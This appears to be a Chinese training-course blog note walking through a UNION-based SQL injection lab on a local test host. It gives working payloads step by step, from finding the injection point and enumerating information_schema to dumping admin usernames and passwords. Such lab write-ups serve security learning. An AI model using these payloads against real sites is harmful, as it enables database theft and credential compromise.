NSATP-A学习笔记之Day3-3SQL联合查询
2021/8/3 2:06:02
本文主要是介绍NSATP-A学习笔记之Day3-3SQL联合查询,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
文章目录
- 简单的sql注入漏洞
- 实验目的
- 实验环境
- 实验工具
- 实验内容
- 免责声明
简单的sql注入漏洞
实验目的
-
练习sql注入
-
实验环境
wamp
- IP:
172.16.12.2
- IP:
实验工具
火狐浏览器
:是一款非常流行的internet浏览器蚁剑
:是一款专业的网站管理软件,本次试验主要用到其动态脚本管理功能- hackbar:Hackbar是一个Firefox的插件,是一种简单的安全审计/渗透测试工具。此工具栏将帮助您测试SQL注入
information_schema | +-- tables | | | `-- table_name | | | `-- table_schema | `-- columns | `-- column_name | `-- table_name | `-- table_schema
实验内容
1、访问172.16.12.2
2、点开一个页面(如公司介绍),发现通过typeid.php页面传递typeid参数来访问页面,这里可能是个注入点
3、测试寻找注入点
Payload:http://172.16.12.2/typeid.php?typeid=1'%23 发现
4、Order by判断列数,判断出有5列
Payload:http://172.16.12.2/typeid.php?typeid=1 order by 5%23
5、使用联合注入判断回显位,回显位为2
Payload: http://172.16.12.2/typeid.php?typeid=-1 union select 1,2,3,4,5%23
6、查看当前数据库名
Payload: http://172.16.12.2/typeid.php?typeid=-1 union select 1,database(),3,4,5%23
7、查看数据库下的表
Payload: http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(table_name)from information_schema.columns where table_schema=database()),3,4,5%23
8、查看jdy_admin表里的列
Payload: http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=database()and table_name=jdy_admin),3,4,5%23
发现没回显内容,我们尝试将表名进行16进制编码(0x6a64795f61646d696e)后再进行尝试
Payload: http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=database()and table_name=0x6a64795f61646d696e),3,4,5%23
9、查看列中的数据username,password
Payload: http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(username,password)from jdycms.jdy_admin),3,4,5%23
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!
这篇关于NSATP-A学习笔记之Day3-3SQL联合查询的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-10-01基于Python+Vue开发的医院门诊预约挂号系统
- 2024-10-01基于Python+Vue开发的旅游景区管理系统
- 2024-10-01RestfulAPI入门指南:打造简单易懂的API接口
- 2024-10-01初学者指南:了解和使用Server Action
- 2024-10-01Server Component入门指南:搭建与配置详解
- 2024-10-01React 中使用 useRequest 实现数据请求
- 2024-10-01使用 golang 将ETH账户的资产平均分散到其他账户
- 2024-10-01JWT用户校验课程:从入门到实践
- 2024-10-01Server Component课程入门指南
- 2024-09-30Dnd-Kit学习:新手快速入门指南